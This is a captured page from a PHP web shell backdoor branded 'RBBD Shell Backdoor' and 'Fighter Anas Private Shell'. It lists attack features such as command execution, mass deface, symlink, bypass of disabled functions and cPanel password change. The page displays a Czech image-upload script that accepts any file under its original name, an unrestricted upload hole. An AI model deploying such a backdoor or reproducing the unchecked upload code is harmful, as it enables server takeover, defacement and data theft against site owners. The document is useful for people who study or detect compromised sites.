⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
!!!
/
backup
/
!!b
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/!!!/backup/!!b/upload_test.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> <head> <meta name="author" content="Ladislav Müllner" /> <meta name="title" content="Nahrání obrázku na server" /> <meta name="keywords" content="Nahrání obrázku na server" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="content-language" content="cs" /> <meta name="geo.country" content="cz" /> <meta name="copyright" content="© 2013 Ladislav Müllner. All rights reserved." /> <meta name="description" content="Nahrání obrázku na server" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <title>Nahrání obrázku na server</title> </head> <body> <form enctype="multipart/form-data" action="upload_test.php" method="post"> <fieldset><legend>Vložit obrázek:</legend> <input type="file" name="userfile" /> <br /> <p> <input type="submit" value="Nahrát" /> </form> <?php // In PHP versions earlier than 4.1.0, $HTTP_POST_FILES should be used instead // of $_FILES. $uploaddir = './www/uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); //tato funkce zajistí správné nastavení přístupových práv umask(0); echo '<pre>'; if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; } else { echo "Possible file upload attack!\n"; } echo 'Here is some more debugging info:'; print_r($_FILES); print "</pre>"; ?> </fieldset> </body> </html>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas